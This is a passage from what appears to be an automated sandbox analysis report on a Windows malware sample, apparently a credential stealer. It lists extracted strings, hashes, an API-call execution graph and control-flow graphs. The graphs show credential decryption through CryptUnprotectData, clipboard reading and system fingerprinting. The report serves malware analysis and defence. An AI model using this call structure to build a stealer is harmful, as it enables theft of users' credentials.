                                                                                • String ID: ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS$3$runtime: netpoll: PostQueuedCompletionStatus failed (errno= abiRegArgsType needs GC Prog, update methodValueCallFrameObjsoffset parameter must be a multiple of the system's page sizex509: failed to parse URI constraint %q: cannot be IP addressx509: internal er$runtime: netpoll: PostQueuedCompletionStatus failedx509: certificate has expired or is not yet valid: ConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWFileAlignment larger than 0x200 and not a power of 2`
                                                                                • API String ID: 0-736920523
                                                                                • Opcode ID: 8b5b4126673c314f8c09c05a6d890812da4a42dbe44a5286481664918e450b95
                                                                                • Instruction ID: 7ffd5afb09fea0a5eb01cd26ff862fb54d104ff7168f15e8fe8157afb78397e4
                                                                                • Opcode Fuzzy Hash: 8b5b4126673c314f8c09c05a6d890812da4a42dbe44a5286481664918e450b95
                                                                                • Instruction Fuzzy Hash: 212114B4408B418FD300FF65D19572EBBE4AF88348F80885DE4898B392D7B99948CB63
                                                                                Function 00AB3DC0 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • write of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi, xrefs: 00AB3DEC
                                                                                • $, xrefs: 00AB3E53
                                                                                • Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Address Of Data too spread outUnable to determine system directoryaccessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Re, xrefs: 00AB3E4A
                                                                                • to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWe, xrefs: 00AB3E16
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWe$$$Go pointer stored into non-Go memoryIA5String contains invalid characterPower PC with floating point supportThunk Address Of Data too spread outUnable to determine system directoryaccessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Re$write of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi
                                                                                • API String ID: 0-842866254
                                                                                • Opcode ID: 9ab770772740cbfd8028ebaa834b217d0c44f490412cb4e4f4270ee67f4b2432
                                                                                • Instruction ID: eaf8f0538d866d8c949bcd306d44175a805bd025ab186b3f56345c55c0fdcd98
                                                                                • Opcode Fuzzy Hash: 9ab770772740cbfd8028ebaa834b217d0c44f490412cb4e4f4270ee67f4b2432
                                                                                • Instruction Fuzzy Hash: F701D7B4808B459FC700FF65E29575EBBE5FF44308F908D2DE4888B252D7749844DB62

                                                                                Execution Graph

                                                                                Execution Coverage:8.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:20.4%
                                                                                Total number of Nodes:378
                                                                                Total number of Limit Nodes:28
                                                                                execution_graph 13912 408640 13914 40864f 13912->13914 13913 4088e6 ExitProcess 13914->13913 13915 408664 GetCurrentProcessId GetCurrentThreadId 13914->13915 13924 4088cf 13914->13924 13916 408690 SHGetSpecialFolderPathW 13915->13916 13917 40868c 13915->13917 13919 408770 13916->13919 13917->13916 13919->13919 13928 43bc90 13919->13928 13921 408797 GetForegroundWindow 13923 408811 13921->13923 13923->13924 13931 40c660 CoInitializeEx 13923->13931 13932 43d860 13924->13932 13935 43f000 13928->13935 13930 43bc9a RtlAllocateHeap 13930->13921 13937 43efe0 13932->13937 13934 43d865 FreeLibrary 13934->13913 13936 43f010 13935->13936 13936->13930 13936->13936 13938 43efe9 13937->13938 13938->13934 13939 42b842 13941 42b84e 13939->13941 13940 42b86e FreeLibrary 13943 42b87b 13940->13943 13941->13940 13941->13941 13942 42b90b GetComputerNameExA 13944 42b946 13942->13944 13943->13942 13943->13943 13944->13944 14364 42c282 14365 42c28c 14364->14365 14366 42c34d GetPhysicallyInstalledSystemMemory 14365->14366 14367 42c390 14366->14367 14367->14367 13945 40dc41 13946 40dc51 13945->13946 13975 4237d0 13946->13975 13948 40dc77 13988 423a60 13948->13988 13950 40dc97 14001 425850 13950->14001 13956 40dcc9 14036 427cb0 13956->14036 13958 40dcf2 14048 432d70 OpenClipboard 13958->14048 13960 40dd1b 13961 4237d0 5 API calls 13960->13961 13962 40dd56 13961->13962 13963 423a60 4 API calls 13962->13963 13964 40dd76 13963->13964 13965 425850 4 API calls 13964->13965 13966 40dd96 13965->13966 13967 426000 3 API calls 13966->13967 13968 40dd9f 13967->13968 13969 426340 3 API calls 13968->13969 13970 40dda8 13969->13970 13971 427cb0 3 API calls 13970->13971 13972 40ddd1 13971->13972 13973 432d70 6 API calls 13972->13973 13974 40ddfa 13973->13974 13976 423860 13975->13976 13976->13976 13977 423876 RtlExpandEnvironmentStrings 13976->13977 13981 4238c0 13977->13981 13978 42395e 14058 41ef80 13978->14058 13979 423a3b 13979->13948 13981->13978 13981->13979 13982 423bf1 13981->13982 13984 423939 RtlExpandEnvironmentStrings 13981->13984 14062 43fe20 13981->14062 14072 43fb80 13982->14072 13984->13978 13984->13979 13984->13981 13984->13982 13986 423c2a 13986->13979 14082 43fa50 13986->14082 13989 423a6e 13988->13989 13990 43fa50 LdrInitializeThunk 13989->13990 13993 423922 13990->13993 13991 43fe20 3 API calls 13991->13993 13992 42395e 13996 41ef80 3 API calls 13992->13996 13993->13991 13993->13992 13994 423bf1 13993->13994 13997 423939 RtlExpandEnvironmentStrings 13993->13997 14000 423a3b 13993->14000 13995 43fb80 3 API calls 13994->13995 13998 423c2a 13995->13998 13996->14000 13997->13992 13997->13993 13997->13994 13997->14000 13999 43fa50 LdrInitializeThunk 13998->13999 13998->14000 13999->13998 14000->13950 14002 425ad0 14001->14002 14006 425876 14001->14006 14008 425b04 14001->14008 14010 40dcb7 14001->14010 14118 43d880 14002->14118 14004 43fa50 LdrInitializeThunk 14004->14008 14005 43fe20 3 API calls 14005->14006 14006->14002 14006->14005 14007 43fa50 LdrInitializeThunk 14006->14007 14006->14008 14006->14010 14007->14006 14008->14004 14009 43fb80 3 API calls 14008->14009 14008->14010 14012 43d910 LdrInitializeThunk 14008->14012 14127 440480 14008->14127 14009->14008 14013 426000 14010->14013 14012->14008 14014 426020 14013->14014 14015 42606e 14014->14015 14139 43d910 LdrInitializeThunk 14014->14139 14017 43bc90 RtlAllocateHeap 14015->14017 14020 40dcc0 14015->14020 14018 4260e1 14017->14018 14022 42614e 14018->14022 14140 43d910 LdrInitializeThunk 14018->14140 14019 43bcb0 RtlFreeHeap 14019->14020 14023 426340 14020->14023 14022->14019 14141 426360 14023->14141 14025 426354 14025->13956 14026 426349 14026->14025 14161 4398a0 14026->14161 14028 4409e0 LdrInitializeThunk 14034 426d75 14028->14034 14031 426f6f 14178 43d910 LdrInitializeThunk 14031->14178 14033 426c42 14033->13956 14034->14031 14034->14033 14034->14034 14168 440e50 14034->14168 14174 440d70 14034->14174 14035 426c18 14035->14028 14035->14031 14035->14033 14035->14034 14035->14035 14037 427d60 14036->14037 14037->14037 14038 427d86 RtlExpandEnvironmentStrings 14037->14038 14040 427de0 14038->14040 14039 427e5b 14039->13958 14040->14039 14041 427e38 RtlExpandEnvironmentStrings 14040->14041 14042 427e75 14040->14042 14044 428120 14040->14044 14041->14039 14041->14042 14041->14044 14042->14039 14043 440d70 LdrInitializeThunk 14042->14043 14042->14044 14047 428258 14042->14047 14043->14042 14044->14044 14045 4409e0 LdrInitializeThunk 14044->14045 14045->14047 14046 4409e0 LdrInitializeThunk 14046->14047 14047->14046 14047->14047 14049 432d95 14048->14049 14050 432d9a GetClipboardData 14048->14050 14049->13960 14051 432db7 GlobalLock 14050->14051 14052 432fc8 CloseClipboard 14050->14052 14053 432dd1 14051->14053 14055 432dd6 14051->14055 14052->14049 14053->14052 14054 432fb8 GlobalUnlock 14054->14053 14055->14054 14056 432e0e GetWindowLongW 14055->14056 14057 432e78 14056->14057 14057->14054 14059 41efb0 14058->14059 14059->14059 14086 421060 14059->14086 14063 43fe40 14062->14063 14064 43feae 14063->14064 14113 43d910 LdrInitializeThunk 14063->14113 14065 440118 14064->14065 14066 43bc90 RtlAllocateHeap 14064->14066 14065->13981 14069 43ff1a 14066->14069 14068 43bcb0 RtlFreeHeap 14068->14065 14071 43ffae 14069->14071 14114 43d910 LdrInitializeThunk 14069->14114 14071->14068 14073 43fba0 14072->14073 14074 43fc0e 14073->14074 14115 43d910 LdrInitializeThunk 14073->14115 14075 43fe08 14074->14075 14077 43bc90 RtlAllocateHeap 14074->14077 14075->13986 14078 43fc7a 14077->14078 14080 43fd0e 14078->14080 14116 43d910 LdrInitializeThunk 14078->14116 14079 43bcb0 RtlFreeHeap 14079->14075 14080->14079 14083 43fa70 14082->14083 14083->14083 14084 43fb4f 14083->14084 14117 43d910 LdrInitializeThunk 14083->14117 14084->13986 14101 4409e0 14086->14101 14088 4210a3 14089 43bc90 RtlAllocateHeap 14088->14089 14096 41efd9 14088->14096 14090 4210e1 14089->14090 14100 421199 14090->14100 14105 43d910 LdrInitializeThunk 14090->14105 14092 43bcb0 RtlFreeHeap 14094 42179b 14092->14094 14093 43bc90 RtlAllocateHeap 14093->14100 14094->14096 14111 43d910 LdrInitializeThunk 14094->14111 14096->13979 14097 421789 14097->14092 14100->14093 14100->14097 14106 43d910 LdrInitializeThunk 14100->14106 14107 43bcb0 14100->14107 14103 440a00 14101->14103 14102 440b4e 14102->14088 14103->14102 14112 43d910 LdrInitializeThunk 14103->14112 14105->14090 14106->14100 14108 43bcc3 14107->14108 14109 43bcd4 14107->14109 14110 43bcc8 RtlFreeHeap 14108->14110 14109->14100 14110->14109 14111->14094 14112->14102 14113->14064 14114->14071 14115->14074 14116->14080 14117->14084 14119 43d8e5 14118->14119 14120 43d899 14118->14120 14121 43bc90 RtlAllocateHeap 14119->14121 14122 43d8f0 14120->14122 14123 43d8d0 RtlReAllocateHeap 14120->14123 14124 43d8a7 14120->14124 14125 43d8e3 14120->14125 14121->14125 14126 43bcb0 RtlFreeHeap 14122->14126 14123->14125 14124->14123 14125->14008 14126->14125 14128 44048f 14127->14128 14129 4405ef 14128->14129 14137 43d910 LdrInitializeThunk 14128->14137 14131 43bc90 RtlAllocateHeap 14129->14131 14134 44080f 14129->14134 14132 440675 14131->14132 14132->14132 14135 44074e 14132->14135 14138 43d910 LdrInitializeThunk 14132->14138 14133 43bcb0 RtlFreeHeap 14133->14134 14134->14008 14135->14133 14137->14129 14138->14135 14139->14015 14140->14022 14142 4263a0 14141->14142 14142->14142 14179 43bce0 14142->14179 14149 4267cc 14149->14026 14150 4264fc 14150->14149 14151 426425 14150->14151 14153 426a1b 14150->14153 14201 43c440 14150->14201 14205 43c100 14151->14205 14153->14026 14154 4409e0 LdrInitializeThunk 14153->14154 14158 426d75 14154->14158 14155 440d70 LdrInitializeThunk 14155->14158 14156 440e50 LdrInitializeThunk 14156->14158 14157 426f6f 14209 43d910 LdrInitializeThunk 14157->14209 14158->14155 14158->14156 14158->14157 14160 426f09 14158->14160 14160->14026 14165 4398d0 14161->14165 14162 43fa50 LdrInitializeThunk 14162->14165 14163 43fe20 3 API calls 14163->14165 14164 439a1c 14164->14035 14165->14162 14165->14163 14165->14164 14166 440480 3 API calls 14165->14166 14217 43d910 LdrInitializeThunk 14165->14217 14166->14165 14170 440e70 14168->14170 14169 440f9e 14169->14034 14172 440ede 14170->14172 14218 43d910 LdrInitializeThunk 14170->14218 14172->14169 14219 43d910 LdrInitializeThunk 14172->14219 14176 440d90 14174->14176 14175 440dfe 14175->14034 14176->14175 14220 43d910 LdrInitializeThunk 14176->14220 14178->14033 14180 43bd00 14179->14180 14182 43bd5e 14180->14182 14210 43d910 LdrInitializeThunk 14180->14210 14181 42640d 14189 43bf90 14181->14189 14182->14181 14184 43bc90 RtlAllocateHeap 14182->14184 14186 43be0f 14184->14186 14185 43bcb0 RtlFreeHeap 14185->14181 14188 43be8f 14186->14188 14211 43d910 LdrInitializeThunk 14186->14211 14188->14185 14190 426419 14189->14190 14191 43bfa2 14189->14191 14190->14150 14190->14151 14193 43c510 14190->14193 14191->14190 14212 43d910 LdrInitializeThunk 14191->14212 14194 43c560 14193->14194 14200 43c5be 14194->14200 14213 43d910 LdrInitializeThunk 14194->14213 14195 43cd0e 14195->14150 14197 43cca2 14197->14195 14214 43d910 LdrInitializeThunk 14197->14214 14199 43d910 LdrInitializeThunk 14199->14200 14200->14195 14200->14197 14200->14199 14203 43c460 14201->14203 14202 43c4ce 14202->14150 14203->14202 14215 43d910 LdrInitializeThunk 14203->14215 14206 43c10a 14205->14206 14208 43c17e 14205->14208 14206->14208 14216 43d910 LdrInitializeThunk 14206->14216 14208->14153 14209->14149 14210->14182 14211->14188 14212->14190 14213->14200 14214->14195 14215->14202 14216->14208 14217->14165 14218->14172 14219->14169 14220->14175 14221 43db42 14222 43db70 14221->14222 14222->14222 14223 43dbce 14222->14223 14228 43d910 LdrInitializeThunk 14222->14228 14227 43d910 LdrInitializeThunk 14223->14227 14226 43dcd1 14227->14226 14228->14223 14229 4209c0 14230 4209ce 14229->14230 14232 420a20 14229->14232 14233 420ae0 14230->14233 14234 420af0 14233->14234 14234->14234 14237 440ba0 14234->14237 14236 420bbf 14238 440bc0 14237->14238 14239 440d1e 14238->14239 14241 43d910 LdrInitializeThunk 14238->14241 14239->14236 14241->14239 14368 436805 14369 43681d 14368->14369 14370 436831 GetUserDefaultUILanguage 14369->14370 14371 436858 14370->14371 14372 42de0c 14375 414110 14372->14375 14374 42de11 CoSetProxyBlanket 14375->14374 14242 42b94d 14244 42b959 GetComputerNameExA 14242->14244 14245 4229cd 14246 422aa0 14245->14246 14248 4229e0 14245->14248 14247 422d9c 14249 422def 14247->14249 14250 4231c0 RtlExpandEnvironmentStrings 14247->14250 14248->14246 14248->14248 14251 422b58 14248->14251 14255 422fcf 14248->14255 14254 423210 14250->14254 14251->14247 14251->14249 14266 43d910 LdrInitializeThunk 14251->14266 14252 4235e1 14258 421060 3 API calls 14252->14258 14253 423420 14253->14252 14259 4232b4 14253->14259 14264 423448 14253->14264 14254->14252 14254->14253 14254->14259 14260 42328c RtlExpandEnvironmentStrings 14254->14260 14262 4232dc 14254->14262 14254->14264 14267 43d910 LdrInitializeThunk 14255->14267 14258->14259 14260->14252 14260->14253 14260->14259 14260->14262 14260->14264 14261 423591 GetLogicalDrives 14265 440ba0 LdrInitializeThunk 14261->14265 14262->14262 14263 440ba0 LdrInitializeThunk 14262->14263 14263->14253 14264->14261 14264->14264 14265->14259 14266->14251 14267->14249 14376 43e19a 14378 43e1a2 14376->14378 14377 43e21e 14378->14377 14380 43d910 LdrInitializeThunk 14378->14380 14380->14377 14268 409d5e 14269 409d80 14268->14269 14269->14269 14270 409e16 LoadLibraryExW 14269->14270 14271 409e27 14270->14271 14381 40c69e CoInitializeSecurity 14272 43e262 14273 43e2a0 14272->14273 14273->14273 14274 43e42e 14273->14274 14276 43d910 LdrInitializeThunk 14273->14276 14276->14274 14277 419362 14278 419380 14277->14278 14282 4193ee 14278->14282 14283 43d910 LdrInitializeThunk 14278->14283 14280 41933a 14281 4197d1 CryptUnprotectData 14281->14282 14282->14280 14282->14281 14283->14282 14284 43bce0 14285 43bd00 14284->14285 14287 43bd5e 14285->14287 14294 43d910 LdrInitializeThunk 14285->14294 14286 43bf5e 14287->14286 14289 43bc90 RtlAllocateHeap 14287->14289 14291 43be0f 14289->14291 14290 43bcb0 RtlFreeHeap 14290->14286 14293 43be8f 14291->14293 14295 43d910 LdrInitializeThunk 14291->14295 14293->14290 14294->14287 14295->14293 14296 433767 14297 43377d 14296->14297 14300 433960 14297->14300 14301 43399d GetObjectW 14300->14301 14303 433aaa 14301->14303 14382 43e6a5 GetForegroundWindow 14383 43e6b3 14382->14383 14304 43dce9 14305 43dd10 14304->14305 14306 43dd6e 14305->14306 14310 43d910 LdrInitializeThunk 14305->14310 14308 43e21e 14306->14308 14311 43d910 LdrInitializeThunk 14306->14311 14308->14308 14310->14306 14311->14308 14312 418df1 14313 418fbd 14312->14313 14314 418dfd 14312->14314 14315 440ba0 LdrInitializeThunk 14314->14315 14315->14313 14384 4316b2 CoSetProxyBlanket 14321 4384f0 14322 438515 14321->14322 14325 4385f2 14322->14325 14330 43d910 LdrInitializeThunk 14322->14330 14323 4387f0 14325->14323 14327 4386e7 14325->14327 14329 43d910 LdrInitializeThunk 14325->14329 14327->14323 14331 43d910 LdrInitializeThunk 14327->14331 14329->14325 14330->14322 14331->14327 14385 42c736 14387 42c770 14385->14387 14386 42c89e 14387->14386 14389 43d910 LdrInitializeThunk 14387->14389 14389->14386 14332 40e875 14337 432fe0 14332->14337 14338 433015 GetSystemMetrics GetSystemMetrics 14337->14338 14339 433058 14338->14339 14340 40d6f8 14341 40d720 14340->14341 14344 438860 14341->14344 14343 40d88d 14346 438890 CoCreateInstance 14344->14346 14347 438af5 SysAllocString 14346->14347 14352 438ebb 14346->14352 14350 438b83 14347->14350 14349 438ee5 GetVolumeInformationW 14357 438f03 14349->14357 14351 438b8b CoSetProxyBlanket 14350->14351 14350->14352 14351->14352 14353 438bab SysAllocString 14351->14353 14352->14349 14355 438c70 14353->14355 14355->14355 14356 438ca8 SysAllocString 14355->14356 14359 438ccf 14356->14359 14357->14343 14358 438ea9 SysFreeString SysFreeString 14358->14352 14359->14358 14360 438e9f 14359->14360 14361 438d17 VariantInit 14359->14361 14360->14358 14362 438d70 14361->14362 14362->14362 14363 438e8e VariantClear 14362->14363 14363->14360

                                                                                Executed Functions

                                                                                Function 00438860 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 666memorycomCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 438860-438889 1 438890-4388c2 0->1 1->1 2 4388c4-4388d9 1->2 3 4388e0-438912 2->3 3->3 4 438914-438954 3->4 5 438960-438988 4->5 5->5 6 43898a-4389a3 5->6 8 4389a5-4389af 6->8 9 438a1a-438a23 6->9 10 4389b0-4389c9 8->10 11 438a30-438a96 9->11 10->10 13 4389cb-4389de 10->13 11->11 12 438a98-438aef CoCreateInstance 11->12 14 438ed5-438f01 call 43f450 GetVolumeInformationW 12->14 15 438af5-438b29 12->15 16 4389e0-438a0e 13->16 22 438f03-438f07 14->22 23 438f0b-438f0d 14->23 17 438b30-438b59 15->17 16->16 19 438a10-438a15 16->19 17->17 20 438b5b-438b85 SysAllocString 17->20 19->9 28 438ec5-438ed1 20->28 29 438b8b-438ba5 CoSetProxyBlanket 20->29 22->23 25 438f1d-438f28 23->25 26 438f34-438f46 25->26 27 438f2a-438f31 25->27 30 438f50-438fb0 26->30 27->26 28->14 31 438ebb-438ec1 29->31 32 438bab-438bbb 29->32 30->30 33 438fb2-438fe7 30->33 31->28 35 438bc0-438be3 32->35 36 438ff0-43903a 33->36 35->35 37 438be5-438c65 SysAllocString 35->37 36->36 38 43903c-43906d call 41dc90 36->38 39 438c70-438ca6 37->39 43 439070-439078 38->43 39->39 41 438ca8-438cd5 SysAllocString 39->41 46 438cdb-438cfd 41->46 47 438ea9-438eb9 SysFreeString * 2 41->47 43->43 45 43907a-43907c 43->45 48 439082-439092 call 408060 45->48 49 438f10-438f17 45->49 53 438d03-438d06 46->53 54 438e9f-438ea5 46->54 47->31 48->49 49->25 52 439097-43909e 49->52 53->54 56 438d0c-438d11 53->56 54->47 56->54 57 438d17-438d62 VariantInit 56->57 58 438d70-438d99 57->58 58->58 59 438d9b-438dad 58->59 60 438db1-438db3 59->60 61 438db9-438dbf 60->61 62 438e8e-438e9b VariantClear 60->62 61->62 63 438dc5-438dd3 61->63 62->54 64 438dd5-438dda 63->64 65 438e0d 63->65 67 438dec-438df0 64->67 66 438e0f-438e4d call 407ed0 call 408d20 65->66 78 438e4f-438e65 66->78 79 438e7d-438e8a call 407ee0 66->79 69 438df2-438dfb 67->69 70 438de0 67->70 73 438e02-438e06 69->73 74 438dfd-438e00 69->74 72 438de1-438dea 70->72 72->66 72->67 73->72 75 438e08-438e0b 73->75 74->72 75->72 78->79 80 438e67-438e74 78->80 79->62 80->79 82 438e76-438e79 80->82 82->79
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
                                                                                • SysAllocString.OLEAUT32(k2`0), ref: 00438B60
                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
                                                                                • SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
                                                                                • SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
                                                                                • VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
                                                                                • VariantClear.OLEAUT32(?), ref: 00438E8F
                                                                                • SysFreeString.OLEAUT32(?), ref: 00438EB3
                                                                                • SysFreeString.OLEAUT32(?), ref: 00438EB9
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00438EC6
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                • String ID: ,./,$0NuNup=Nu$S$]E$]E$b>c<$k2`0$x;
                                                                                • API String ID: 2573436264-1088545154
                                                                                • Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                • Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
                                                                                • Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
                                                                                • Instruction Fuzzy Hash: 3122EFB66083419BD310CF28C885B6BBBE5EFC9314F14892DF595DB2A0DB79D805CB86
                                                                                Function 00419362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390encryptionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 84 419362-419374 85 419380-4193bb 84->85 85->85 86 4193bd-4193c5 85->86 87 4193c7-4193d6 86->87 88 41940a-419465 call 401a50 86->88 89 4193e0-4193e7 87->89 96 419470-4194d2 88->96 91 4193f0-4193f6 89->91 92 4193e9-4193ec 89->92 91->88 95 4193f8-419407 call 43d910 91->95 92->89 94 4193ee 92->94 94->88 95->88 96->96 97 4194d4-4194fb call 401d90 96->97 102 419502-41956f 97->102 103 4195f2-4195f4 97->103 104 41933a 97->104 105 419570-4195c7 102->105 106 419600-419606 103->106 109 419340-419349 call 407ee0 104->109 105->105 107 4195c9-4195eb call 401d90 105->107 106->106 108 419608-41963e 106->108 107->102 107->103 107->109 119 419360 107->119 120 41934c-419351 107->120 112 419640-419643 108->112 113 419645-419648 108->113 109->120 112->113 116 41964a 112->116 117 41964c-419658 113->117 116->117 121 41965a-41965d 117->121 122 41965f 117->122 119->119 120->119 121->122 123 419660-41967e call 407ed0 121->123 122->123 126 419795-4197f4 call 43f450 CryptUnprotectData 123->126 127 419684-41968b 123->127 126->102 126->103 128 4196b2-4196fc call 41d140 * 2 127->128 135 4196a0-4196ac 128->135 136 4196fe-419719 call 41d140 128->136 135->126 135->128 136->135 139 41971b-419743 136->139 140 419691-419695 139->140 141 419749-41975f call 41d140 139->141 140->135 144 419765-419790 141->144 145 41968d 141->145 144->135 145->140
                                                                                APIs
                                                                                  • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004197EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataInitializeThunkUnprotect
                                                                                • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                • API String ID: 279577407-4262920783
                                                                                • Opcode ID: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                • Instruction ID: e77fc135ad70ed6736d1295220b367ee2e65166797322382e6457787232dfc05
                                                                                • Opcode Fuzzy Hash: 432f6f01f6f39532e5583c1ea13b867eeb044dab6d0921c5a80d4da759cddaac
                                                                                • Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46
                                                                                Function 004229CD Relevance: 11.5, APIs: 3, Strings: 3, Instructions: 1008COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 272 4229cd-4229d9 273 4229e0-4229fd 272->273 274 422a10-422a1f 272->274 275 422ad0 272->275 276 422a40-422a4e 272->276 277 422ad6-422ae6 272->277 278 422a26-422a39 272->278 279 422a6f-422a7f 272->279 273->274 273->275 273->276 273->277 273->278 273->279 274->274 274->275 274->276 274->278 274->279 276->274 276->279 280 422a60-422a68 276->280 283 422b40 277->283 284 422e31-422e63 call 40a600 277->284 286 422b58-422b74 277->286 288 422aed-422b2c call 43f450 * 2 277->288 289 422e6a-422e7d 277->289 278->274 278->275 278->276 278->279 279->275 279->277 279->280 281 422aa0-422aab 279->281 282 422ac0 279->282 279->283 279->284 285 422a86-422a99 279->285 279->286 287 422aae-422ab4 279->287 279->288 280->274 280->279 281->287 282->275 314 422b48-422b51 283->314 284->289 306 422eb2-422eb7 284->306 307 422e90-422eab 284->307 308 422ee5-422ef7 284->308 309 422ebe-422ede 284->309 313 422f00-422f12 284->313 285->275 285->277 285->280 285->281 285->282 285->283 285->284 285->286 285->287 285->288 285->289 290 422be2-422bea 286->290 291 422bc0 286->291 292 422b80-422b8a 286->292 293 